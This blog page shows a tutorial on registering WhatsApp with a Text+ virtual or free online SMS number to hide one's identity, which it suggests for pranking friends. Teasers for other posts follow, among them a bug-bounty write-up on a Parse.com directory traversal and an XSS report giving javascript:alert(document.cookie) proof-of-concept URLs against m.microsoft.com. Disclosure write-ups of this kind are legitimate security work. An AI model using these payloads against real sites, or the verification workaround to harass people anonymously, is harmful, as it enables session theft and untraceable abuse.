Skip to main content

Use WhatsApp without using your Mobile Number


Use WhatsApp without using your Mobile Number

Well today I will be showing you another easy trick that I think many people would be in search for. Well I will be showing you how you can easily install and use WhatsApp without actually entering your mobile number. Yes we won't be doing any mischievous activity but we are going to use some another number from the app that will activate your account and you can easily chat without actually disclosing your number.

  1. You need to install WhatsApp, well either you can do a fresh install or if you are already having WhatsApp installed then you need to remove your number or choose the change number option. (well if you install it indirectly then make sure unknown sources is option is ticked)
  2. Now your WhatsApp is installed we need to install another application called Text+ to get the verification number.
  3. Well you can also try using the Online SMS Verification sites that's provide free number's you can use to get SMS online.
  4. So now if you are using Text+ application simply open Text+ application and navigate to Settings > Contact. Now here you will see your personal number.
  5. Now just copy that number and open WhatsApp and when it asks to enter the number enter that number and then hit verification button.
  6. Now within seconds you will receive SMS Verification code on your phone in the Text+ application.
  7. Now enter that code and your WhatsApp will be verified to be used to send messages, audio clips, video's and pretty much everything.
So now guys enjoy using your WhatsApp anonymously without even disclosing your real identity, well it could be used for pranking your friends. Because they won't be able to call on that number but you can easily send messages. So do pass comment about how you like this one and do like and share this post with your friends.

Comments

Popular posts from this blog

HC WeB : A Browser for HACKERS...

A Browser for HACKERS... Try for Free... Download HC WeB Setup Gallery: Online Penetration Testing Tools Index Information Gathering Whois DNS Location Info Enumeration and Fingerprint Data Mining Search Engines Editors Online Text Editors Share Text Snippets Network Utilities Ping HTTP HTTPS VNC Remote Desktop SSH DNS Sniffers Misc Forensics Frameworks URL Cloaking E-mail Password Cracking Encoders and Decoders Encoders Decoders Malwares Malware Analysis Identify Malicious Websites Suspected Malicious IPs and URLs Application Auditing SQL Injection Cross Site Scripting File Inclusion Anonymity Proxy Others Hackery Open Penetration Testing Bookmarks Collection Hacker Media Blogs, Forums, Magazines and Videos. Methodologies Penetration testing frameworks, standards and methodologies. OSINT Presentations, People, Organizations and Infrastructure.  Exploits an...

Facebook Web Security Bug Bounty: Directory Traversal Vulnerability / RCE In Parse.com

http://parse.com   directory traversal vulnerability Little Insight: http://parse.com  was vulnerable to a directory traversal / RCE vulnerability. As a result, it was possible for an attacker to load web server-readable files from the local filesystem. or Run commend on That Well this is my 4th reward form facebook  Directory Traversal or RCE Vulnerability  That  give me 5th position in Facebook white-hat Page Report Date :23  July 2014 Reward For Directory Traversal or RCE Vulnerability :  20000$ How This work......? As we discussed earlier on my old post  Flowdock Directory Traversal Vulnerability exposed files outside of Rails’ view paths. '%5C' turns into '\' after decoding. Using Rack::Protection    it only rejects '/../' segments in the request path.   patch apply for Rack::Protection acording CVE-2014-0130  and  also Reject now '%5C' turns into '\' af...

xss in Microsoft mobile domain

Cookies xss in Microsoft mobile domain also it have xframe open vulnerability for click jacking Domain: m.microsoft.com Poc url steps for reproduce issue are same in both url so I am send both url and steps by using one of them Poc urls : 1.          http://m.microsoft.com/showcase/en/US/Search.mspx?a=results&mid=3900&phrase=%5burl%3djavascript:alert(document.cookie)%5dClick%20here%20to%20see%20Result%5b/url%5d&Search = 2.        http://m.microsoft.com/showcase/en/US/search?pageindex=sv1:2&phrase=[url%3djavascript:alert%28document.cookie%29]click%20here%20and%20see%20your%20result[/url ] Vulnerable parameter: phrase= Steps for reproduce issue Poc url http://m.microsoft.com/showcase/en/US/search?pageindex=sv1:2&phrase=[url%3djavascript:alert%28document.cookie%29]click%20here%20and%20see%20your%20result[/url ] when users use url .That give a result in Microsoft site lik...